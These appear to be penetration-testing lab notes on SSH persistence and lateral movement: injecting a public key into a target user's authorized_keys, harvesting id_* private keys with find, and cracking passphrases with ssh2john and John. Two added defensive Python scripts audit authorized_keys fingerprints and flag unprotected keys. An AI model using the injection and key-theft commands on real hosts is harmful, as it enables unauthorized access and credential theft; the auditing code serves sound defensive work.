Pivoting/Lateral Movement

Persistence


Pivoting to SSH

SSH Key Injection

Generate SSH Keys
ssh-keygen -t ed25519 -f key
  • If the authorized_keys file doesn't exist, create one containing your public key:

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c" > /home/dvir/.ssh/authorized_keys
  • Otherwise, append your public key:

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c" >> /home/dvir/.ssh/authorized_keys
  • Now just connect with your private key:

ssh -i key dvir@10.10.11.8
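From the defender's side, the persistence above leaves a trace that is cheap to audit: an authorized_keys entry whose fingerprint nobody approved. The following is an added example, not part of these notes, that parses authorized_keys lines in sshd's format ([options] keytype base64-blob comment), fingerprints each key the way `ssh-keygen -lf` prints it (SHA256 of the decoded blob, unpadded base64), checks that the declared key type matches the type embedded in the blob, and flags anything missing from an allow-list. The sample file and the 32-byte key values are constructed for the demonstration and are not real key material.

```python
import base64
import binascii
import hashlib
import shlex
import struct
import sys
from typing import Dict, List, Optional, Set

KEY_TYPES = {
    "ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
    "ecdsa-sha2-nistp521", "sk-ssh-ed25519@openssh.com",
    "sk-ecdsa-sha2-nistp256@openssh.com",
}


def ed25519_line(raw32: bytes, comment: str, options: str = "") -> str:
    """Build a constructed authorized_keys line (not a real key): the wire blob is
    string(keytype) || string(32-byte value), then base64-encoded."""
    ktype = b"ssh-ed25519"
    blob = struct.pack(">I", len(ktype)) + ktype + struct.pack(">I", len(raw32)) + raw32
    prefix = options + " " if options else ""
    return f"{prefix}ssh-ed25519 {base64.b64encode(blob).decode()} {comment}"


# Constructed sample file: one approved key, one unexpected key, one key locked
# to a forced command, and one line whose declared type contradicts its blob.
KNOWN_LINE = ed25519_line(b"\x11" * 32, "deploy@ci")
ROGUE_LINE = ed25519_line(b"\x22" * 32, "b0llull0s@p4n1c")
RESTRICTED_LINE = ed25519_line(b"\x33" * 32, "backup@nas",
                               options='command="/usr/bin/rrsync /srv/backup",no-pty')
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample authorized_keys",
    KNOWN_LINE,
    ROGUE_LINE,
    RESTRICTED_LINE,
    "ssh-rsa " + KNOWN_LINE.split()[1] + " mismatched@example",
])


def fingerprint(blob: bytes) -> str:
    """SHA256 fingerprint in the form printed by `ssh-keygen -lf` (unpadded base64)."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one entry into options, declared type, embedded type, fingerprint and
    comment. Options may contain quoted strings with spaces, so tokenise with shlex
    and treat everything before the first recognised key type as options."""
    try:
        tokens = shlex.split(line)
    except ValueError:          # unbalanced quotes in the options field
        return None
    idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
    if idx is None or idx + 1 >= len(tokens):
        return None
    try:
        blob = base64.b64decode(tokens[idx + 1], validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(blob) < 4:
        return None
    (n,) = struct.unpack(">I", blob[:4])
    return {
        "options": " ".join(tokens[:idx]),
        "type": tokens[idx],
        "embedded_type": blob[4:4 + n].decode("ascii", "replace"),
        "fingerprint": fingerprint(blob),
        "comment": " ".join(tokens[idx + 2:]),
    }


def audit(text: str, allowed: Set[str]) -> List[Dict[str, object]]:
    """One finding per entry that is unparseable, internally inconsistent, or not in
    the allow-list of approved fingerprints. Comment lines and blanks are skipped."""
    findings: List[Dict[str, object]] = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        entry = parse_line(line)
        if entry is None:
            findings.append({"line": lineno, "reason": "unparseable", "comment": ""})
        elif entry["embedded_type"] != entry["type"]:
            findings.append({"line": lineno, "reason": "type-mismatch", "comment": entry["comment"]})
        elif entry["fingerprint"] not in allowed:
            findings.append({"line": lineno, "reason": "unknown-key", "comment": entry["comment"]})
    return findings


def line_fingerprint(line: str) -> str:
    """Fingerprint of a single known-good line, for building the allow-list."""
    entry = parse_line(line)
    if entry is None:
        raise ValueError("not a valid authorized_keys entry")
    return entry["fingerprint"]


if __name__ == "__main__":
    # Usage: python audit_authorized_keys.py [/path/to/authorized_keys]
    # Without a path, the constructed sample is audited against its two approved keys.
    approved = {line_fingerprint(KNOWN_LINE), line_fingerprint(RESTRICTED_LINE)}
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_AUTHORIZED_KEYS
    for f in audit(text, approved):
        print(f"line {f['line']}: {f['reason']} {f['comment']}".rstrip())
```

The type-mismatch check runs before the allow-list check on purpose: a blob that is approved but presented under a different key type is still a tampered line, and the audit should say so rather than silently pass it. Comparing against fingerprints rather than full lines also means a re-wrapped or re-commented copy of an approved key does not produce noise.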

Using Existing keys

Look for the private key
find /home/user -name "id_*" -exec cat {} \;
  • Once you find one, copy it into your own .ssh directory and ssh in with it.

  • You can also check whether the corresponding private/public key pair is already known by using this repo.

Crack the passphrase

  • Once you have the private key, use ssh2john to generate a hash from it:

ssh2john private_key > private_key.hash
  • Then feed this hash into John the Ripper:

john private_key.hash --wordlist=/path/to/wordlist
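Both of the last two sections (reusing a found key, and cracking its passphrase) come down to one property of the key file: whether it is protected at all, and how expensively. The example below is added here and is not part of these notes; it reads only the unencrypted header of a private key file and reports what it finds, so a defender can sweep home directories for keys that would hand over access with no cracking needed, or that use a cheap KDF. For the `openssh-key-v1` format it parses the cipher name, KDF name and bcrypt round count (the field `ssh-keygen -a` sets); for the legacy PEM format it reads the `Proc-Type`/`DEK-Info` headers. The sample key files are constructed with dummy payloads in the correct layout and contain no real key material.

```python
import base64
import struct
from pathlib import Path
from typing import Dict, List, Optional


def _string(b: bytes) -> bytes:
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def _armour(blob: bytes) -> str:
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


def constructed_openssh_key(cipher: bytes, kdf: bytes, kdfoptions: bytes) -> str:
    """Constructed file in the openssh-key-v1 layout with dummy payloads (no real key
    material): magic, ciphername, kdfname, kdfoptions, nkeys, public key, private section."""
    blob = (b"openssh-key-v1\x00" + _string(cipher) + _string(kdf) + _string(kdfoptions)
            + struct.pack(">I", 1) + _string(b"dummy-public-key") + _string(b"dummy-private-section"))
    return _armour(blob)


UNPROTECTED = constructed_openssh_key(b"none", b"none", b"")
PROTECTED = constructed_openssh_key(b"aes256-ctr", b"bcrypt",
                                    _string(b"\x00" * 16) + struct.pack(">I", 16))  # salt, rounds
LEGACY_ENCRYPTED = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\nQUJD\n"
                    "-----END RSA PRIVATE KEY-----\n")
LEGACY_PLAIN = "-----BEGIN RSA PRIVATE KEY-----\nQUJD\n-----END RSA PRIVATE KEY-----\n"


class _Reader:
    """Sequential reader for SSH wire types."""
    def __init__(self, data: bytes) -> None:
        self.data, self.pos = data, 0

    def u32(self) -> int:
        (v,) = struct.unpack_from(">I", self.data, self.pos)
        self.pos += 4
        return v

    def string(self) -> bytes:
        n = self.u32()
        s = self.data[self.pos:self.pos + n]
        if len(s) != n:
            raise ValueError("truncated key blob")
        self.pos += n
        return s


def inspect_private_key(pem_text: str) -> Dict[str, object]:
    """Report how a private key file is protected without decrypting anything."""
    lines = [ln.strip() for ln in pem_text.strip().splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN ") or not lines[-1].startswith("-----END "):
        raise ValueError("not a PEM-armoured key")
    label = lines[0][len("-----BEGIN "):].rstrip("-").strip()
    if label == "OPENSSH PRIVATE KEY":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(b"openssh-key-v1\x00"):
            raise ValueError("bad openssh-key-v1 magic")
        r = _Reader(blob[15:])
        cipher, kdf, opts = r.string().decode(), r.string().decode(), r.string()
        rounds: Optional[int] = None
        if kdf == "bcrypt":
            o = _Reader(opts)
            o.string()          # salt
            rounds = o.u32()    # fewer rounds means a cheaper offline guess per candidate
        return {"format": "openssh", "cipher": cipher, "kdf": kdf,
                "kdf_rounds": rounds, "encrypted": cipher != "none"}
    # Legacy PEM: encryption is signalled by RFC 1421 style headers before the body.
    headers = dict(ln.split(":", 1) for ln in lines[1:-1] if ":" in ln)
    dek = headers.get("DEK-Info", "").strip()
    return {"format": "legacy-pem", "label": label,
            "cipher": dek.split(",")[0] if dek else "none", "kdf": None, "kdf_rounds": None,
            "encrypted": "ENCRYPTED" in headers.get("Proc-Type", "")}


def find_unprotected(files: Dict[str, str]) -> List[str]:
    """Paths (from a {path: contents} mapping) whose key has no passphrase at all."""
    return sorted(p for p, text in files.items() if not inspect_private_key(text)["encrypted"])


def scan_home(root: str) -> Dict[str, str]:
    """Collect id_* private keys under a directory, mirroring the find command above."""
    return {str(p): p.read_text() for p in Path(root).rglob("id_*")
            if p.is_file() and p.suffix != ".pub"}


if __name__ == "__main__":
    # With no real files to hand, run over the constructed samples.
    samples = {"/home/a/.ssh/id_ed25519": UNPROTECTED, "/home/b/.ssh/id_rsa": PROTECTED,
               "/home/c/.ssh/id_rsa": LEGACY_PLAIN, "/home/d/.ssh/id_rsa": LEGACY_ENCRYPTED}
    for path, text in samples.items():
        print(path, inspect_private_key(text))
    print("no passphrase:", find_unprotected(samples))
```

On a real host you would call `find_unprotected(scan_home("/home"))`; the `kdf_rounds` value is worth reporting alongside, because a key with a passphrase but the default 16 rounds is the kind of target the ssh2john/John workflow above is built for, and re-saving it with a higher `-a` count is the cheap fix.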
